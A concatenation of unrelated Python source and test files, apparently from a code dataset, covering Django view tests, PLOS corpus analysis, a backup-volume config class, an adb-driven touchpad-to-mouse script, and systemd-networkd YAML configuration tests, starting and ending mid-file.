url(r'^update-user/(?P<pk>\d+)/$', view=UpdateUserView.as_view(), name='update-user'),
url(r'^delete-user/(?P<pk>\d+)/$', view=DeleteUserView.as_view(), name='delete-user'),
url(r'^detail-user/(?P<pk>\d+)/$', view=DetailUserView.as_view(), name='detail-user')
]
@override_settings(ROOT_URLCONF='tests.test_django_forms_mixin')
class AccessLogModelFormMixinTestCase(TestCase):
def setUp(self):
        self.user = User.objects.create_user('testuser', 'testuser@example.com', 'test123.')
self.client.login(username=self.user.username, password='test123.')
def test_create_view_object_is_logged(self):
response = self.client.post(reverse('create-user'), data={
'username': 'another-user',
            'email': 'another-user@example.com',
'password': 'test123.'
})
self.assertEqual(response.status_code, 200)
def test_detail_view_object_is_logged(self):
response = self.client.get(reverse('detail-user', kwargs={'pk': self.user.pk}))
self.assertEqual(response.status_code, 200)
|
python
|
"""
This set of functions is for analyzing all the articles in the PLOS corpus. A Jupyter Notebook is provided with
examples of analysis. It can:
* compare the articles indexed in Solr, PMC, and article pages
* spot-check individual JATS fields for irregularities
* create summaries of articles by type, publication date, etc
* generate lists of retracted or corrected articles
"""
import collections
import csv
import os
import random
import requests
from tqdm import tqdm
from .. import get_corpus_dir, newarticledir
from ..plos_regex import (validate_doi, full_doi_regex_match, validate_url, validate_filename)
from ..transformations import (filename_to_doi, doi_to_url)
from ..plos_corpus import (listdir_nohidden, uncorrected_proofs_text_list,
download_updated_xml, get_all_solr_dois,
download_check_and_move)
from ..article import Article
counter = collections.Counter
pmcdir = "pmc_articles"
max_invalid_files_to_print = 100
def validate_corpus(directory=None):
"""
For every local article file and DOI listed on Solr, validate file names, DOIs, URLs in terms of
regular expressions.
Stops checking as soon as encounters problem and prints it
:return: boolean of whether corpus passed validity checks
"""
if directory is None:
directory = get_corpus_dir()
# check DOIs
plos_dois = get_all_plos_dois()
plos_valid_dois = [doi for doi in plos_dois if validate_doi(doi)]
if set(plos_dois) == set(plos_valid_dois):
pass
else:
print("Invalid DOIs: {}".format(set(plos_dois) - set(plos_valid_dois)))
return False
# check urls
plos_urls = [doi_to_url(doi) for doi in plos_valid_dois]
plos_valid_urls = [url for url in plos_urls if validate_url(url)]
if set(plos_urls) == set(plos_valid_urls) and len(plos_valid_urls) == len(plos_valid_dois):
pass
else:
print("Invalid URLs: {}".format(set(plos_urls) - set(plos_valid_urls)))
return False
# check files and filenames
plos_files = listdir_nohidden(directory)
if plos_files:
plos_valid_filenames = [article for article in plos_files if validate_filename(article)]
if len(plos_valid_dois) == len(plos_valid_filenames):
pass
else:
print("Invalid filenames: {}".format(set(plos_valid_dois) - set(plos_valid_filenames)))
return False
plos_valid_files = [article for article in plos_valid_filenames if os.path.isfile(article)]
if set(plos_valid_filenames) == set(plos_valid_files):
return True
else:
invalid_files = set(plos_valid_filenames) - set(plos_valid_files)
if len(invalid_files) > max_invalid_files_to_print:
print("Too many invalid files to print: {}".format(len(invalid_files)))
else:
print("Invalid files: {}".format(invalid_files))
return False
else:
print("Corpus directory empty. Re-download by running create_local_plos_corpus()")
return False
# These functions are for getting the article types of all PLOS articles.
def get_jats_article_type_list(article_list=None, directory=None):
"""Makes a list of of all JATS article types in the corpus
Sorts them by frequency of occurrence
:param article_list: list of articles, defaults to None
:param directory: directory of articles, defaults to get_corpus_dir()
    :returns: list of (JATS article type, number of occurrences) tuples, sorted by frequency
    :rtype: list
"""
if directory is None:
directory = get_corpus_dir()
if article_list is None:
article_list = listdir_nohidden(directory)
jats_article_type_list = []
for article_file in tqdm(article_list):
article = Article.from_filename(article_file, directory=directory)
jats_article_type_list.append(article.type_)
print(len(set(jats_article_type_list)), 'types of articles found.')
article_types_structured = counter(jats_article_type_list).most_common()
return article_types_structured
def get_plos_article_type_list(article_list=None, directory=None):
"""Makes a list of of all internal PLOS article types in the corpus
Sorts them by frequency of occurrence
:param article_list: list of articles, defaults to None
:param directory: directory of articles, defaults to get_corpus_dir()
    :returns: list of (PLOS article type, number of occurrences) tuples, sorted by frequency
    :rtype: list
"""
if directory is None:
directory = get_corpus_dir()
if article_list is None:
article_list = listdir_nohidden(directory)
PLOS_article_type_list = []
for article_file in tqdm(article_list):
article = Article.from_filename(article_file, directory=directory)
PLOS_article_type_list.append(article.plostype)
print(len(set(PLOS_article_type_list)), 'types of articles found.')
PLOS_article_types_structured = counter(PLOS_article_type_list).most_common()
return PLOS_article_types_structured
def get_article_types_map(article_list=None, directory=None):
"""Maps the JATS and PLOS article types onto the XML DTD.
Used for comparing how JATS and PLOS article types are assigned
:param article_list: list of articles, defaults to None
:param directory: directory of articles, defaults to get_corpus_dir()
:returns: list of tuples of JATS, PLOS, DTD for each article in the corpus
:rtype: list
"""
if directory is None:
directory = get_corpus_dir()
if article_list is None:
article_list = listdir_nohidden(directory)
article_types_map = []
    for article_file in tqdm(article_list):
article = Article.from_filename(article_file)
article.directory = directory
types = [article.type_, article.plostype, article.dtd]
types = tuple(types)
article_types_map.append(types)
return article_types_map
def article_types_map_to_csv(article_types_map):
"""put the `get_article_types_map.()` list of tuples into a csv.
:param article_types_map: output of `get_article_types_map()`
"""
with open('articletypes.csv', 'w') as out:
csv_out = csv.writer(out)
        csv_out.writerow(['jats_article_type', 'plos_article_type', 'dtd_version'])
for row in article_types_map:
csv_out.writerow(row)
# These functions are for getting retracted articles
def get_retracted_doi_list(article_list=None, directory=None):
"""
Scans through articles in a directory to see if they are retraction notifications,
scans articles that are that type to find DOIs of retracted articles
:return: tuple of lists of DOIs for retractions articles, and retracted articles
"""
if directory is None:
directory = get_corpus_dir()
retractions_doi_list = []
retracted_doi_list = []
if article_list is None:
article_list = listdir_nohidden(directory)
for art in tqdm(article_list):
article = Article.from_filename(art)
article.directory = directory
if article.type_ == 'retraction':
retractions_doi_list.append(article.doi)
# Look in those articles to find actual articles that are retracted
retracted_doi_list.extend(article.related_dois)
# check linked DOI for accuracy
for doi in article.related_dois:
if bool(full_doi_regex_match.search(doi)) is False:
print("{} has incorrect linked DOI field: '{}'".format(art, doi))
print(len(retracted_doi_list), 'retracted articles found.')
return retractions_doi_list, retracted_doi_list
def get_amended_article_list(article_list=None, directory=None):
"""
Scans through articles in a directory to see if they are amendment notifications,
scans articles that are that type to find DOI substrings of amended articles
:param article: the filename for a single article
:param directory: directory where the article file is, default is get_corpus_dir()
:return: list of DOIs for articles issued a correction
"""
if directory is None:
directory = get_corpus_dir()
amendments_article_list = []
amended_article_list = []
if article_list is None:
article_list = listdir_nohidden(directory)
# check for amendments article type
for art in tqdm(article_list):
article = Article.from_filename(art)
article.directory = directory
if article.amendment:
amendments_article_list.append(article.doi)
# get the linked DOI of the amended article
amended_article_list.extend(article.related_dois)
# check linked DOI for accuracy
for doi in article.related_dois:
if bool(full_doi_regex_match.search(doi)) is False:
print(article.doi, "has incorrect linked DOI:", doi)
print(len(amended_article_list), 'amended articles found.')
return amendments_article_list, amended_article_list
# These functions are for checking for silent XML updates
def create_pubdate_dict(directory=None):
"""
For articles in directory, create a dictionary mapping them to their pubdate.
Used for truncating the revisiondate_sanity_check to more recent articles only
:param directory: directory of articles
:return: a dictionary mapping article files to datetime objects of their pubdates
"""
if directory is None:
directory = get_corpus_dir()
articles = listdir_nohidden(directory)
pubdates = {art: Article.from_filename(art).pubdate for art in articles}
return pubdates
def revisiondate_sanity_check(article_list=None, tempdir=newarticledir, directory=None, truncated=True):
"""
:param truncated: if True, restrict articles to only those with pubdates from the last year or two
"""
if directory is None:
directory = get_corpus_dir()
list_provided = bool(article_list)
if article_list is None and truncated is False:
article_list = listdir_nohidden(directory)
if article_list is None and truncated:
pubdates = create_pubdate_dict(directory=directory)
article_list = sorted(pubdates, key=pubdates.__getitem__, reverse=True)
article_list = article_list[:30000]
try:
os.mkdir(tempdir)
except FileExistsError:
pass
articles_different_list = []
for article_file in tqdm(article_list):
updated = download_updated_xml(article_file=article_file)
if updated:
articles_different_list.append(article_file)
if list_provided:
article_list.remove(article_file) # helps save time if need to restart process
    print(len(article_list), "articles checked for updates.")
print(len(articles_different_list), "articles have updates.")
return articles_different_list
def check_solr_doi(doi):
'''
For an article doi, see if there's a record of it in Solr.
:rtype: bool
'''
solr_url = 'http://api.plos.org/search?q=*%3A*&fq=doc_type%3Afull&fl=id,&wt=json&indent=true&fq=id:%22{}%22'.format(doi)
article_search = requests.get(solr_url).json()
return bool(article_search['response']['numFound'])
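# Usage sketch (the DOI below is hypothetical):
#   check_solr_doi('10.1371/journal.pone.0000001')
# returns True only if Solr reports at least one matching full-document record.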
def get_all_local_dois(directory=None):
"""Get all local DOIs in a corpus directory.
:param directory: directory of articles, defaults to get_corpus_dir()
:returns: list of DOIs
:rtype: list
"""
if directory is None:
directory = get_corpus_dir()
local_dois = [filename_to_doi(art) for art in listdir_nohidden(directory)]
return local_dois
def get_all_plos_dois(local_articles=None, solr_articles=None):
'''
Collects lists of articles for local and solr, calculates the difference.
Missing local downloads easily solved by re-running plos_corpus.py.
Missing solr downloads require attention.
:return: every DOI in PLOS corpus, across local and remote versions
'''
if solr_articles is None:
solr_articles = get_all_solr_dois()
if local_articles is None:
local_articles = get_all_local_dois()
missing_local_articles = set(solr_articles) - set(local_articles)
if missing_local_articles:
print('re-run plos_corpus.py to download latest {0} PLOS articles locally.'
.format(len(missing_local_articles)))
missing_solr_articles = set(local_articles) - set(solr_articles)
plos_articles = set(solr_articles + local_articles)
if missing_solr_articles:
        print('\033[1m' + 'Articles that need to be re-indexed on Solr:')
print('\033[0m' + '\n'.join(sorted(missing_solr_articles)))
return plos_articles
def get_random_list_of_dois(directory=None, count=100):
'''
Gets a list of random DOIs. Tries first to construct from local files in
directory, otherwise tries Solr DOI list as backup.
:param directory: defaults to get_corpus_dir()
:param count: specify how many DOIs are to be returned
:return: a list of random DOIs for analysis
'''
if directory is None:
directory = get_corpus_dir()
try:
article_list = listdir_nohidden(directory)
sample_file_list = random.sample(article_list, count)
sample_doi_list = [filename_to_doi(f) for f in sample_file_list]
except OSError:
doi_list = get_all_solr_dois()
sample_doi_list = random.sample(doi_list, count)
return sample_doi_list
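# A small sketch combining the helpers above (the sample size is arbitrary): draw a few
# random DOIs and check whether each one is indexed in Solr.
#   for doi in get_random_list_of_dois(count=5):
#       print(doi, check_solr_doi(doi))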
def get_article_metadata(article_file, size='small'):
"""
    For an individual article in the PLOS corpus, create a tuple of metadata fields about that article.
Make it small, medium, or large depending on number of fields desired.
:param article_file: individual local PLOS XML article
:param size: small, medium or large, aka how many fields to return for each article
    :return: tuple of metadata fields, or False if the number of fields is unexpected
"""
article = Article.from_filename(article_file)
doi = article.doi
filename = os.path.basename(article.filename).rstrip('.xml')
title = article.title
journal = article.journal
jats_article_type = article.type_
plos_article_type = article.plostype
dtd_version = article.dtd
dates = article.get_dates()
(pubdate, collection, received, accepted, revdate) = ('', '', '', '', '')
pubdate = article.pubdate
revdate = article.revdate
counts = article.counts
(fig_count, table_count, page_count) = ('', '', '')
body_word_count = article.word_count
related_articles = article.related_dois
abstract = article.abstract
try:
collection = dates['collection']
except KeyError:
pass
try:
received = dates['received']
except KeyError:
pass
try:
accepted = dates['accepted']
except KeyError:
pass
try:
fig_count = counts['fig-count']
except KeyError:
pass
try:
table_count = counts['table-count']
except KeyError:
pass
try:
page_count = counts['page-count']
except KeyError:
pass
metadata = [doi, filename, title, journal, jats_article_type, plos_article_type, dtd_version, pubdate, revdate, received,
accepted, collection, fig_count, table_count, page_count, body_word_count, related_articles, abstract]
metadata = tuple(metadata)
if len(metadata) == 18:
return metadata
else:
print('Error in {}: {} items'.format(article_file, len(metadata)))
return False
def get_corpus_metadata(article_list=None, directory=None):
"""
Run get_article_metadata() on a list of files, by default every file in directory
Includes a progress bar
TODO: this does not return a tuple, other parts of the code expect it to return a tuple, and its docs expect a tuple
:param article_list: list of articles to run it on
:return: list of tuples for each article; list of dicts for wrong date orders
"""
if directory is None:
directory = get_corpus_dir()
if article_list is None:
article_list = listdir_nohidden(directory)
corpus_metadata = []
for article_file in tqdm(article_list):
metadata = get_article_metadata(article_file)
corpus_metadata.append(metadata)
return corpus_metadata
def corpus_metadata_to_csv(corpus_metadata=None,
article_list=None,
wrong_dates=None,
csv_file='allofplos_metadata.csv',
directory=None
):
"""
Convert list of tuples from get_article_metadata to csv
:param corpus_metadata: the list of tuples, defaults to None
:param article_list: TODO: needs documentation, defaults to None
:param wrong_dates: TODO: needs documentation, defaults to None
    :param csv_file: string, TODO: needs more documentation, defaults to 'allofplos_metadata.csv'
    :param directory: directory of articles, defaults to get_corpus_dir()
:return: None
"""
if directory is None:
directory = get_corpus_dir()
if corpus_metadata is None:
corpus_metadata, wrong_dates = get_corpus_metadata(article_list, directory=directory)
# write main metadata csv file
with open(csv_file, 'w') as out:
csv_out = csv.writer(out)
csv_out.writerow(['doi', 'filename', 'title', 'journal', 'jats_article_type', 'plos_article_type',
'dtd_version', 'pubdate', 'revdate', 'received', 'accepted', 'collection', 'fig_count', 'table_count',
'page_count', 'body_word_count', 'related_article', 'abstract'])
for row in corpus_metadata:
csv_out.writerow(row)
# write wrong dates csv file, with longest dict providing the keys
if wrong_dates:
keys = max(wrong_dates, key=len).keys()
with open('wrong_dates.csv', 'w') as out:
dict_writer = csv.DictWriter(out, keys)
dict_writer.writeheader()
dict_writer.writerows(wrong_dates)
def read_corpus_metadata_from_csv(csv_file='allofplos_metadata.csv'):
"""
reads in a csv of data, excluding the header row
:param csv_file: csv file of data, defaults to 'allofplos_metadata.csv'
:return: list of tuples of article metadata
"""
with open(csv_file, 'r') as csv_file:
reader = csv.reader(csv_file)
next(reader, None)
corpus_metadata = [tuple(line) for line in reader]
return corpus_metadata
def update_corpus_metadata_csv(csv_file='allofplos_metadata.csv', comparison_dois=None, directory=None):
"""
Incrementally update the metadata of PLOS articles in the csv file
:param csv_file: csv file of data, defaults to 'allofplos_metadata.csv'
    :param comparison_dois: list of DOIs to check whether their metadata is included
    :return: updated corpus metadata
"""
if directory is None:
directory = get_corpus_dir()
# Step 1: get metadata and DOI list from existing csv file
try:
corpus_metadata = read_corpus_metadata_from_csv(csv_file)
csv_doi_list = [row[0] for row in corpus_metadata]
except FileNotFoundError:
corpus_metadata = []
csv_doi_list = []
# Step 2: compare DOI list with master list
if comparison_dois is None:
comparison_dois = get_all_solr_dois()
dois_needed_list = list(set(comparison_dois) - set(csv_doi_list))
# Step 3: compare to local file list
local_doi_list = [filename_to_doi(article_file) for article_file in listdir_nohidden(directory)]
files_needed_list = list(set(dois_needed_list) - set(local_doi_list))
if files_needed_list:
print('Local corpus must be updated before .csv metadata can be updated.\nUpdating local corpus now')
download_check_and_move(files_needed_list,
uncorrected_proofs_text_list,
tempdir=newarticledir,
destination=directory)
# Step 4: append new data to existing list
new_corpus_metadata, wrong_dates = get_corpus_metadata(article_list=dois_needed_list)
corpus_metadata.extend(new_corpus_metadata)
# Step 5: write new dataset to .csv
corpus_metadata_to_csv(corpus_metadata=corpus_metadata, csv_file='allofplos_metadata_updated.csv')
return corpus_metadata
|
python
|
import json
import jk_json
import jk_typing
import jk_prettyprintobj
from thaniya_common.cfg import CfgKeyValueDefinition
from thaniya_common.cfg import AbstractCfgComponent
from .BackupVolumeID import BackupVolumeID
class _Magic(AbstractCfgComponent):
MAGIC = "thaniya-volume-cfg"
__VALID_KEYS = [
CfgKeyValueDefinition("magic", str, False),
CfgKeyValueDefinition("version", int, False),
]
def __init__(self):
super().__init__(_Magic.__VALID_KEYS)
self._magic = _Magic.MAGIC # str
self._version = 1 # int
self._comment = "This file is part of the Thaniya backup volume management system! Please do not edit this file manually!"
#
#
class _DataV1(AbstractCfgComponent):
__VALID_KEYS = [
#CfgKeyValueDefinition("volumeGroup", str, False), # NOTE: for future implementation; not yet used
CfgKeyValueDefinition("volumeID", BackupVolumeID, False, BackupVolumeID.parseFromStr, str),
CfgKeyValueDefinition("backupBaseDirPath", str, True),
CfgKeyValueDefinition("isActive", bool, False),
]
def __init__(self):
super().__init__(_DataV1.__VALID_KEYS)
#self._volumeGroup = None # str # NOTE: for future implementation; not yet used
self._volumeID = None # BackupVolumeID
self._backupBaseDirPath = None # str
self._isActive = None # bool
#
#
#
# Represents the contents of a backup volume information file.
#
class BackupVolumeCfgFile(jk_prettyprintobj.DumpMixin):
################################################################################################################################
## Constructor Method
################################################################################################################################
def __init__(self):
self._magic = _Magic()
self._data = _DataV1()
#
################################################################################################################################
## Public Properties
################################################################################################################################
@property
def data(self) -> _DataV1:
return self._groups["data"]
#
################################################################################################################################
## Helper Methods
################################################################################################################################
def _dumpVarNames(self) -> list:
return [
"_magic",
"_data",
]
#
################################################################################################################################
## Public Methods
################################################################################################################################
def writeToFile(self, filePath:str):
assert isinstance(filePath, str)
jk_json.saveToFilePretty(self.toJSON(), filePath)
#
def toJSON(self) -> dict:
ret = {
"magic": self._magic.toJSON(),
"data": self._data.toJSON(),
}
return ret
#
def __str__(self):
return json.dumps(self.toJSON(), indent="\t", sort_keys=True)
#
@staticmethod
def loadFromFile(filePath:str):
assert isinstance(filePath, str)
jData = jk_json.loadFromFile(filePath)
return BackupVolumeCfgFile.loadFromJSON(jData)
#
@staticmethod
def loadFromJSON(jData:dict):
assert isinstance(jData, dict)
ret = BackupVolumeCfgFile()
ret._magic.loadFromJSON(jData["magic"])
assert ret._magic._magic == _Magic.MAGIC
assert ret._magic._version == 1
ret._data.loadFromJSON(jData["data"])
return ret
#
#
# Use this method to set a data value.
#
@jk_typing.checkFunctionSignature()
def setValue(self, name:str, value):
self._data.setValue(name, value)
#
#
# Use this method to read a data value.
#
@jk_typing.checkFunctionSignature()
def getValue(self, name:str):
return self._data.getValue(name)
#
#
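# A minimal usage sketch (the file path below is hypothetical and assumes the JSON was
# previously written by writeToFile()):
#   cfg = BackupVolumeCfgFile.loadFromFile("/mnt/backup/.thaniya-volume.json")
#   print(cfg.getValue("volumeID"), cfg.getValue("isActive"))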
|
python
|
import os
from threading import Thread
from sh import tail
from pymouse import PyMouse
from datetime import datetime, timedelta
import subprocess
WAS_MOVED_SCATTER = 0
# in seconds
SHORT_PRESS = .15
MEDIUM_PRESS = .4
LONG_PRESS = .6
VERY_LONG_PRESS = 1
SCROLL_SENSITIVITY = 10
MOVE_SENSITIVITY = .8
MOVE_SCALING = 1.4
def get_time_delta_in_microseconds(t1, t2):
if t1 == None or t2 == None:
return 666
t_d = t2 - t1
return t_d.seconds + t_d.microseconds / 10 ** 6
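# Note: despite its name, the helper above returns the elapsed time in seconds
# (whole seconds plus fractional microseconds), matching the *_PRESS thresholds above.
# For example, get_time_delta_in_microseconds(t, t + timedelta(milliseconds=500)) == 0.5.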
m = PyMouse()
cur_start_pos = list(m.position())
cur_anchor_x = None
cur_anchor_y = None
pre_x = None
pre_y = None
def wasnt_moved():
if cur_anchor_y == None and cur_anchor_x == None:
return True
return False
c_p = m.position()
print(cur_start_pos)
print(c_p)
d_x = abs(cur_start_pos[0] - c_p[0])
d_y = abs(cur_start_pos[1] - c_p[1])
return d_x < WAS_MOVED_SCATTER and d_y < WAS_MOVED_SCATTER
scroll_counter = 0
def scroll(val):
global scroll_counter
scroll_counter += val
if scroll_counter > SCROLL_SENSITIVITY:
while scroll_counter > SCROLL_SENSITIVITY:
scroll_counter -= SCROLL_SENSITIVITY
m.click((4))
elif scroll_counter < -SCROLL_SENSITIVITY:
while scroll_counter < -SCROLL_SENSITIVITY:
scroll_counter += SCROLL_SENSITIVITY
m.click((5))
# Thread(target = os.system, args = (adb_cmd, )).start()
horizontal = False
press_down_time = None
press_up_time = None
count_click = 0
count_hold = 0
is_holded = False
is_scrolled = False
is_stop = False
adb_cmd = 'adb shell getevent -l'.split()
# adb_cmd = 'adb shell getevent -l > event.log'
def sing(val):
return -1 if val < 0 else 1
def execute(cmd):
popen = subprocess.Popen(cmd, stdout=subprocess.PIPE, universal_newlines=True)
for stdout_line in iter(popen.stdout.readline, ""):
yield stdout_line
popen.stdout.close()
return_code = popen.wait()
if return_code:
raise subprocess.CalledProcessError(return_code, cmd)
# Example
# for path in execute(["locate", "a"]):
# print(path, end="")
# runs forever
# for line in tail("-f", "event.log", _iter=True):
for line in execute(adb_cmd):
if not is_stop and (
'ABS_MT_POSITION_X' in line and horizontal or
'ABS_MT_POSITION_Y' in line and not horizontal):
unpress_time = get_time_delta_in_microseconds(
press_down_time, datetime.now()
)
if unpress_time > SHORT_PRESS:
count_click = 0
if (count_click == 1 and wasnt_moved() and not is_holded):
is_holded = True
m.press()
val = int(line.split()[3], 16)
if (pre_x != None):
d_x = val - pre_x
pre_x = val
else:
pre_x = val
if not is_scrolled:
continue
if not cur_anchor_x:
cur_anchor_x = val
elif not is_scrolled:
d_x = pow(abs(d_x) * MOVE_SENSITIVITY, MOVE_SCALING) * sing(d_x)
m.move_dx(round(d_x))
elif not is_stop and (
'ABS_MT_POSITION_Y' in line and horizontal or
'ABS_MT_POSITION_X' in line and not horizontal):
unpress_time = get_time_delta_in_microseconds(
press_down_time, datetime.now()
)
if unpress_time > SHORT_PRESS:
count_click = 0
if (count_click == 0 and wasnt_moved() and not is_holded and press_down_time != None):
press_time = get_time_delta_in_microseconds(
press_down_time, datetime.now()
)
if press_time > LONG_PRESS:
is_holded = True
m.press()
val = int(line.split()[3], 16)
if (pre_y != None):
d_y = val - pre_y
pre_y = val
else:
pre_y = val
continue
if not cur_anchor_y:
cur_anchor_y = val
elif is_scrolled:
scroll(d_y)
else:
rev = -1 if not horizontal else 1
d_y = pow(abs(d_y) * MOVE_SENSITIVITY, MOVE_SCALING) * sing(d_y) * rev
m.move_dy(round(d_y))
pre_y = val
elif 'BTN_TOUCH' in line:
cur_start_pos = list(m.position())
val = line.split()[3]
if val == 'UP':
if wasnt_moved() and not is_scrolled:
press_time = get_time_delta_in_microseconds(
press_down_time, datetime.now()
)
if press_time < SHORT_PRESS:
count_click += 1
elif not is_stop and press_time < MEDIUM_PRESS:
m.click(2)
else:
count_click = 0
if not is_stop and count_click == 1:
m.click()
if not is_stop and count_click == 2:
m.click()
elif count_click == 5:
is_stop = not is_stop
else:
count_click = 0
if is_holded:
is_holded = False
m.release()
is_scrolled = False
press_up_time = datetime.now()
press_down_time = None
else:
unpress_time = get_time_delta_in_microseconds(
press_up_time, datetime.now()
)
if unpress_time > SHORT_PRESS:
count_click = 0
            if not horizontal and pre_x is not None and pre_x > 1600:
is_scrolled = True
press_down_time = datetime.now()
press_up_time = None
# count_hold += 1
# m.press()
cur_anchor_x = None
cur_anchor_y = None
elif 'ABS_MT_PRESSURE' in line:
pass
# print(line, end = '')
# print(line)
|
python
|
#Write a Python program to add leading zeroes to a string.
string = '5699'
print()
print(string.rjust(7, '0'))
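# str.zfill is an alternative that also left-pads with zeros and, unlike rjust,
# keeps a leading '+'/'-' sign in front of the padding:
print(string.zfill(7))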
|
python
|
from django.apps import AppConfig
class DbSearchConfig(AppConfig):
name = 'db_search'
|
python
|
import os
import shutil
import unittest
import pandas as pd
from python_tools.workflow_tools.qc.fingerprinting import (
read_csv,
plot_genotyping_matrix
)
class FingerprintingTestCase(unittest.TestCase):
def setUp(self):
"""
Set some constants used for testing
:return:
"""
# CD into this test module if running all tests together
if os.path.isdir('test__fingerprinting'):
os.chdir('test__fingerprinting')
# Set up test outputs directory
os.mkdir('./test_output')
def tearDown(self):
"""
Remove test outputs after each test
:return:
"""
shutil.rmtree('./test_output')
# Move back up to main test dir
os.chdir('..')
    def test_plot_genotyping_matrix(self):
geno_compare = read_csv('./test_data/Geno_compare.txt')
title_file = pd.read_csv('./test_data/title_file.txt')
plot_genotyping_matrix(geno_compare, './test_output/', title_file)
if __name__ == '__main__':
unittest.main()
|
python
|
#!/usr/bin/python3
# SPDX-License-Identifier: Apache-2.0
# Copyright © 2020 VMware, Inc.
import os
import sys
import subprocess
import time
import shutil
import configparser
import pytest
import collections
import unittest
networkd_unit_file_path = '/etc/systemd/network'
network_config_manager_ci_path = '/run/network-config-manager-ci'
network_config_manager_ci_yaml_path = '/run/network-config-manager-ci/yaml'
network_config_manager_config_path = '/etc/network-config-manager'
network_config_manager_yaml_config_path = '/etc/network-config-manager/yaml'
network_config_manager_wpa_supplilant_conf_file = '/etc/network-config-manager/wpa_supplicant.conf'
units = ["10-test99.network",
"10-test98.network",
'10-test-99.network',
"10-wlan1.network",
"10-wlan0.network",
'10-test98.network',
'10-vlan-98.network',
'10-vlan-98.netdev',
'10-vlan-98.network',
'10-vxlan-98.network',
'10-vxlan-98.netdev',
'10-bridge-98.netdev',
'10-bridge-98.network',
'10-bond-98.netdev',
         '10-bond-98.network',
         '10-macvlan-98.netdev',
         '10-macvlan-98.network',
         '10-macvtap-98.netdev',
         '10-macvtap-98.network',
         '10-ipvlan-98.netdev',
         '10-ipvtap-98.network',
         '10-vrf-98.netdev',
         '10-vrf-98.network',
         '10-veth-98.netdev',
         '10-veth-98.network',
         '10-ipip-98.netdev',
         '10-ipip-98.network',
         '10-sit-98.netdev',
         '10-sit-98.network',
         '10-gre-98.netdev',
         '10-gre-98.network',
         '10-vti-98.netdev',
         '10-vri-98.network',
         '10-wg99.netdev',
         '10-wg99.network']
def link_exits(link):
return os.path.exists(os.path.join('/sys/class/net', link))
def link_remove(link):
if os.path.exists(os.path.join('/sys/class/net', link)):
subprocess.call(['ip', 'link', 'del', 'dev', link])
def link_add_dummy(link):
subprocess.call(['ip', 'link', 'add', 'dev', link, 'type', 'dummy'])
def unit_exits(unit):
return os.path.exists(os.path.join(networkd_unit_file_path, unit))
def wifi_wpa_supplilant_conf_exits():
return os.path.exists(network_config_manager_wpa_supplilant_conf_file)
def remove_units_from_netword_unit_path():
for i in units:
if (os.path.exists(os.path.join(networkd_unit_file_path, i))):
os.remove(os.path.join(networkd_unit_file_path, i))
def restart_networkd():
subprocess.call(['systemctl', 'restart', 'systemd-networkd'])
subprocess.check_call(['sleep', '5'])
def dequote(s):
if len(s) < 2:
        return s
s = s.replace('"', '')
return s
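# e.g. dequote('"my-ssid"') returns 'my-ssid'; note that every '"' in the string is
# stripped, not just a surrounding pair.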
def read_wpa_supplicant_conf(conf_file):
networks = None
if not os.path.isfile(conf_file):
print("File path {} does not exist".format(conf_file))
return None
with open(conf_file) as fp:
for line in fp:
line = line.strip()
if not line or line.startswith('#'):
continue
if line.startswith('network'):
networks = collections.OrderedDict()
continue
if line.startswith('}'):
break
if (networks is None):
continue
x = line.split('=', 1)
k = x[0].strip()
v = dequote(x[1].strip())
networks[k] = v
return networks
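# A sketch of the wpa_supplicant.conf shape this parser expects (only the first
# network block is read; the SSID/PSK values are placeholders):
#
#   network={
#       ssid="my-ssid"
#       psk="my-passphrase"
#   }
#
# which read_wpa_supplicant_conf returns as
# OrderedDict([('ssid', 'my-ssid'), ('psk', 'my-passphrase')]).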
class TestNetworkConfigManagerYAML:
yaml_configs = [
"dhcp.yaml",
"dhcp-client-identifier.yaml",
"network-section-dhcp-section.yaml",
"static-network.yaml",
"static-route-network.yaml",
]
def copy_yaml_file_to_netmanager_yaml_path(self, config_file):
shutil.copy(os.path.join(network_config_manager_ci_yaml_path, config_file), network_config_manager_yaml_config_path)
def remove_units_from_netmanager_yaml_path(self):
for config_file in self.yaml_configs:
if (os.path.exists(os.path.join(network_config_manager_yaml_config_path, config_file))):
os.remove(os.path.join(network_config_manager_yaml_config_path, config_file))
def setup_method(self):
link_remove('test99')
link_add_dummy('test99')
restart_networkd()
def teardown_method(self):
self.remove_units_from_netmanager_yaml_path()
remove_units_from_netword_unit_path()
def test_basic_dhcp(self):
self.copy_yaml_file_to_netmanager_yaml_path('dhcp.yaml')
subprocess.check_call(['nmctl', 'apply-yaml-config'])
assert(unit_exits('10-test99.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'DHCP') == 'yes')
def test_dhcp_client_identifier(self):
self.copy_yaml_file_to_netmanager_yaml_path('dhcp-client-identifier.yaml')
subprocess.check_call(['nmctl', 'apply-yaml-config'])
assert(unit_exits('10-test99.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'DHCP') == 'yes')
assert(parser.get('DHCPv4', 'ClientIdentifier') == 'mac')
def test_network_and_dhcp4_section(self):
self.copy_yaml_file_to_netmanager_yaml_path('network-section-dhcp-section.yaml')
subprocess.check_call(['nmctl', 'apply-yaml-config'])
assert(unit_exits('10-test99.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'DHCP') == 'yes')
assert(parser.get('Network', 'LLDP') == 'yes')
assert(parser.get('Network', 'LinkLocalAddressing') == 'yes')
assert(parser.get('Network', 'IPv6AcceptRA') == 'yes')
assert(parser.get('DHCPv4', 'UseDNS') == 'yes')
assert(parser.get('DHCPv4', 'UseDomains') == 'yes')
assert(parser.get('DHCPv4', 'UseMTU') == 'yes')
assert(parser.get('DHCPv4', 'UseNTP') == 'yes')
def test_network_and_dhcp6_section(self):
self.copy_yaml_file_to_netmanager_yaml_path('network-section-dhcp6-section.yaml')
subprocess.check_call(['nmctl', 'apply-yaml-config'])
assert(unit_exits('10-test99.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-test99.network'))
assert(parser.get('Match', 'Name') == 'test99')
assert(parser.get('Network', 'DHCP') == 'yes')
assert(parser.get('Network', 'LinkLocalAddressing') == 'yes')
assert(parser.get('Network', 'IPv6AcceptRA') == 'yes')
assert(parser.get('DHCPv6', 'UseDNS') == 'yes')
assert(parser.get('DHCPv6', 'UseNTP') == 'yes')
@pytest.mark.skip(reason="skipping")
def test_network_static_configuration(self):
